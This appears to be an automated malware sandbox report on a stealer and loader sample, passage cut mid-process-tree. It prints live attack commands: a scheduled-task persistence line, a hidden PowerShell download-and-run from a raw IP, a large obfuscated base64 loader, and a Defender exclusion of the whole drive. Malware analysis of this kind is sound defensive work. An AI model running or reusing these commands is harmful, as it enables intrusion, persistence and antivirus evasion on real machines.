\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-C7A7-316889DB6DBE}\ = "ScreenConnect Client (f63a82ffaf9f93d1) Credential Provider" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-C7A7-316889DB6DBE}\InprocServer32 msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A29DCCB0F978A6CC351527E60284817E\AuthorizedLUAApp = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A29DCCB0F978A6CC351527E60284817E\SourceList\PackageName = "ScreenConnect.ClientSetup.msi" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A29DCCB0F978A6CC351527E60284817E\AdvertiseFlags = "388" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A29DCCB0F978A6CC351527E60284817E\InstanceType = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5B15089AFED232366FA328FFFAF9391D\A29DCCB0F978A6CC351527E60284817E msiexec.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3468 schtasks.exe 4368 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1696 powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3004 powershell.exe 3004 powershell.exe 1656 TempPVHHTNPRDVAAH2JVKPUGUID195KPTH5W.EXE 1656 TempPVHHTNPRDVAAH2JVKPUGUID195KPTH5W.EXE 2324 rapes.exe 2324 rapes.exe 1040 rapes.exe 1040 rapes.exe 1696 powershell.exe 1696 powershell.exe 1696 powershell.exe 5056 powershell.exe 5056 powershell.exe 5056 powershell.exe 1788 msiexec.exe 1788 msiexec.exe 4384 ScreenConnect.ClientService.exe 4384 ScreenConnect.ClientService.exe 4384 ScreenConnect.ClientService.exe 4384 ScreenConnect.ClientService.exe 4384 ScreenConnect.ClientService.exe 4384 ScreenConnect.ClientService.exe 2880 e9ea3a76fa.exe 2880 e9ea3a76fa.exe 2880 e9ea3a76fa.exe 2880 e9ea3a76fa.exe 2880 e9ea3a76fa.exe 2880 e9ea3a76fa.exe 3004 MSBuild.exe 3004 MSBuild.exe 3004 MSBuild.exe 3004 MSBuild.exe 2084 powershell.exe 2084 powershell.exe 2084 powershell.exe 4684 powershell.exe 4684 powershell.exe 4684 powershell.exe 2148 powershell.exe 2148 powershell.exe 2148 powershell.exe 4912 rapes.exe 4912 rapes.exe 2692 powershell.exe 2692 powershell.exe 2692 powershell.exe 4268 2983c11b74.exe 4268 2983c11b74.exe 1348 NP4kBrG.exe 1348 NP4kBrG.exe 4268 2983c11b74.exe 4268 2983c11b74.exe 4268 2983c11b74.exe 4268 2983c11b74.exe 444 MSBuild.exe 444 MSBuild.exe 444 MSBuild.exe 444 MSBuild.exe 2512 Bell_Setup16.tmp 2512 Bell_Setup16.tmp 3468 regsvr32.exe 3468 regsvr32.exe 1300 powershell.exe 1300 powershell.exe -
Suspicious behavior: LoadsDriver 4 IoCs
pid Process 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3004 powershell.exe Token: SeDebugPrivilege 1696 powershell.exe Token: SeDebugPrivilege 5056 powershell.exe Token: SeDebugPrivilege 2544 A9cowK5.exe Token: SeShutdownPrivilege 3480 msiexec.exe Token: SeIncreaseQuotaPrivilege 3480 msiexec.exe Token: SeSecurityPrivilege 1788 msiexec.exe Token: SeCreateTokenPrivilege 3480 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 3480 msiexec.exe Token: SeLockMemoryPrivilege 3480 msiexec.exe Token: SeIncreaseQuotaPrivilege 3480 msiexec.exe Token: SeMachineAccountPrivilege 3480 msiexec.exe Token: SeTcbPrivilege 3480 msiexec.exe Token: SeSecurityPrivilege 3480 msiexec.exe Token: SeTakeOwnershipPrivilege 3480 msiexec.exe Token: SeLoadDriverPrivilege 3480 msiexec.exe Token: SeSystemProfilePrivilege 3480 msiexec.exe Token: SeSystemtimePrivilege 3480 msiexec.exe Token: SeProfSingleProcessPrivilege 3480 msiexec.exe Token: SeIncBasePriorityPrivilege 3480 msiexec.exe Token: SeCreatePagefilePrivilege 3480 msiexec.exe Token: SeCreatePermanentPrivilege 3480 msiexec.exe Token: SeBackupPrivilege 3480 msiexec.exe Token: SeRestorePrivilege 3480 msiexec.exe Token: SeShutdownPrivilege 3480 msiexec.exe Token: SeDebugPrivilege 3480 msiexec.exe Token: SeAuditPrivilege 3480 msiexec.exe Token: SeSystemEnvironmentPrivilege 3480 msiexec.exe Token: SeChangeNotifyPrivilege 3480 msiexec.exe Token: SeRemoteShutdownPrivilege 3480 msiexec.exe Token: SeUndockPrivilege 3480 msiexec.exe Token: SeSyncAgentPrivilege 3480 msiexec.exe Token: SeEnableDelegationPrivilege 3480 msiexec.exe Token: SeManageVolumePrivilege 3480 msiexec.exe Token: SeImpersonatePrivilege 3480 msiexec.exe Token: SeCreateGlobalPrivilege 3480 msiexec.exe Token: SeCreateTokenPrivilege 3480 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 3480 msiexec.exe Token: SeLockMemoryPrivilege 3480 msiexec.exe Token: SeIncreaseQuotaPrivilege 3480 msiexec.exe Token: SeMachineAccountPrivilege 3480 msiexec.exe Token: SeTcbPrivilege 3480 msiexec.exe Token: SeSecurityPrivilege 3480 msiexec.exe Token: SeTakeOwnershipPrivilege 3480 msiexec.exe Token: SeLoadDriverPrivilege 3480 msiexec.exe Token: SeSystemProfilePrivilege 3480 msiexec.exe Token: SeSystemtimePrivilege 3480 msiexec.exe Token: SeProfSingleProcessPrivilege 3480 msiexec.exe Token: SeIncBasePriorityPrivilege 3480 msiexec.exe Token: SeCreatePagefilePrivilege 3480 msiexec.exe Token: SeCreatePermanentPrivilege 3480 msiexec.exe Token: SeBackupPrivilege 3480 msiexec.exe Token: SeRestorePrivilege 3480 msiexec.exe Token: SeShutdownPrivilege 3480 msiexec.exe Token: SeDebugPrivilege 3480 msiexec.exe Token: SeAuditPrivilege 3480 msiexec.exe Token: SeSystemEnvironmentPrivilege 3480 msiexec.exe Token: SeChangeNotifyPrivilege 3480 msiexec.exe Token: SeRemoteShutdownPrivilege 3480 msiexec.exe Token: SeUndockPrivilege 3480 msiexec.exe Token: SeSyncAgentPrivilege 3480 msiexec.exe Token: SeEnableDelegationPrivilege 3480 msiexec.exe Token: SeManageVolumePrivilege 3480 msiexec.exe Token: SeImpersonatePrivilege 3480 msiexec.exe -
Suspicious use of FindShellTrayWindow 37 IoCs
pid Process 1180 2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 1180 2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 1180 2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 3480 msiexec.exe 3480 msiexec.exe 2512 Bell_Setup16.tmp 444 7ef3f93a66.exe 444 7ef3f93a66.exe 444 7ef3f93a66.exe 444 7ef3f93a66.exe 444 7ef3f93a66.exe 444 7ef3f93a66.exe 444 7ef3f93a66.exe 3440 firefox.exe 444 7ef3f93a66.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 444 7ef3f93a66.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 444 7ef3f93a66.exe 3440 firefox.exe 444 7ef3f93a66.exe 7076 msiexec.exe 7076 msiexec.exe -
Suspicious use of SendNotifyMessage 26 IoCs
pid Process 1180 2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 1180 2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 1180 2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 444 7ef3f93a66.exe 444 7ef3f93a66.exe 444 7ef3f93a66.exe 444 7ef3f93a66.exe 444 7ef3f93a66.exe 444 7ef3f93a66.exe 444 7ef3f93a66.exe 444 7ef3f93a66.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 444 7ef3f93a66.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 3440 firefox.exe 444 7ef3f93a66.exe 444 7ef3f93a66.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1348 NP4kBrG.exe 3440 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1180 wrote to memory of 2920 1180 2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 89 PID 1180 wrote to memory of 2920 1180 2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 89 PID 1180 wrote to memory of 2920 1180 2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 89 PID 1180 wrote to memory of 4872 1180 2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 90 PID 1180 wrote to memory of 4872 1180 2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 90 PID 1180 wrote to memory of 4872 1180 2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 90 PID 2920 wrote to memory of 3468 2920 cmd.exe 92 PID 2920 wrote to memory of 3468 2920 cmd.exe 92 PID 2920 wrote to memory of 3468 2920 cmd.exe 92 PID 4872 wrote to memory of 3004 4872 mshta.exe 93 PID 4872 wrote to memory of 3004 4872 mshta.exe 93 PID 4872 wrote to memory of 3004 4872 mshta.exe 93 PID 3004 wrote to memory of 1656 3004 powershell.exe 102 PID 3004 wrote to memory of 1656 3004 powershell.exe 102 PID 3004 wrote to memory of 1656 3004 powershell.exe 102 PID 1656 wrote to memory of 2324 1656 TempPVHHTNPRDVAAH2JVKPUGUID195KPTH5W.EXE 103 PID 1656 wrote to memory of 2324 1656 TempPVHHTNPRDVAAH2JVKPUGUID195KPTH5W.EXE 103 PID 1656 wrote to memory of 2324 1656 TempPVHHTNPRDVAAH2JVKPUGUID195KPTH5W.EXE 103 PID 2324 wrote to memory of 2448 2324 rapes.exe 111 PID 2324 wrote to memory of 2448 2324 rapes.exe 111 PID 2324 wrote to memory of 2448 2324 rapes.exe 111 PID 2448 wrote to memory of 3556 2448 cmd.exe 113 PID 2448 wrote to memory of 3556 2448 cmd.exe 113 PID 2448 wrote to memory of 3556 2448 cmd.exe 113 PID 3556 wrote to memory of 1696 3556 cmd.exe 115 PID 3556 wrote to memory of 1696 3556 cmd.exe 115 PID 3556 wrote to memory of 1696 3556 cmd.exe 115 PID 1696 wrote to memory of 5056 1696 powershell.exe 116 PID 1696 wrote to memory of 5056 1696 powershell.exe 116 PID 1696 wrote to memory of 5056 1696 powershell.exe 116 PID 2324 wrote to memory of 972 2324 rapes.exe 119 PID 2324 wrote to memory of 972 2324 rapes.exe 119 PID 2324 wrote to memory of 972 2324 rapes.exe 119 PID 972 wrote to memory of 2512 972 7d5ce09794.exe 120 PID 972 wrote to memory of 2512 972 7d5ce09794.exe 120 PID 972 wrote to memory of 2512 972 7d5ce09794.exe 120 PID 2512 wrote to memory of 3012 2512 221.exe 122 PID 2512 wrote to memory of 3012 2512 221.exe 122 PID 3012 wrote to memory of 3856 3012 cmd.exe 124 PID 3012 wrote to memory of 3856 3012 cmd.exe 124 PID 3012 wrote to memory of 3856 3012 cmd.exe 124 PID 3856 wrote to memory of 4804 3856 221.exe 125 PID 3856 wrote to memory of 4804 3856 221.exe 125 PID 4804 wrote to memory of 4500 4804 cmd.exe 162 PID 4804 wrote to memory of 4500 4804 cmd.exe 162 PID 4804 wrote to memory of 872 4804 cmd.exe 128 PID 4804 wrote to memory of 872 4804 cmd.exe 128 PID 4804 wrote to memory of 3208 4804 cmd.exe 129 PID 4804 wrote to memory of 3208 4804 cmd.exe 129 PID 4804 wrote to memory of 3440 4804 cmd.exe 131 PID 4804 wrote to memory of 3440 4804 cmd.exe 131 PID 4804 wrote to memory of 2172 4804 cmd.exe 132 PID 4804 wrote to memory of 2172 4804 cmd.exe 132 PID 4804 wrote to memory of 3476 4804 cmd.exe 133 PID 4804 wrote to memory of 3476 4804 cmd.exe 133 PID 4804 wrote to memory of 4568 4804 cmd.exe 134 PID 4804 wrote to memory of 4568 4804 cmd.exe 134 PID 4804 wrote to memory of 3196 4804 cmd.exe 135 PID 4804 wrote to memory of 3196 4804 cmd.exe 135 PID 4804 wrote to memory of 3816 4804 cmd.exe 136 PID 4804 wrote to memory of 3816 4804 cmd.exe 136 PID 4804 wrote to memory of 2252 4804 cmd.exe 137 PID 4804 wrote to memory of 2252 4804 cmd.exe 137 PID 4804 wrote to memory of 1656 4804 cmd.exe 138 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1180 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn Sl6W2masdNy /tr "mshta C:\Users\Admin\AppData\Local\Temp\fZkhgKZa4.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2920 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn Sl6W2masdNy /tr "mshta C:\Users\Admin\AppData\Local\Temp\fZkhgKZa4.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3468
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\fZkhgKZa4.hta2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4872 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'PVHHTNPRDVAAH2JVKPUGUID195KPTH5W.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Users\Admin\AppData\Local\TempPVHHTNPRDVAAH2JVKPUGUID195KPTH5W.EXE"C:\Users\Admin\AppData\Local\TempPVHHTNPRDVAAH2JVKPUGUID195KPTH5W.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1656 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2324 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10373951121\5YB5L4K.cmd"6⤵
- Suspicious use of WriteProcessMemory
PID:2448 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10373951121\5YB5L4K.cmd"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3556 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1696 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5056
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10374380101\7d5ce09794.exe"C:\Users\Admin\AppData\Local\Temp\10374380101\7d5ce09794.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:972 -
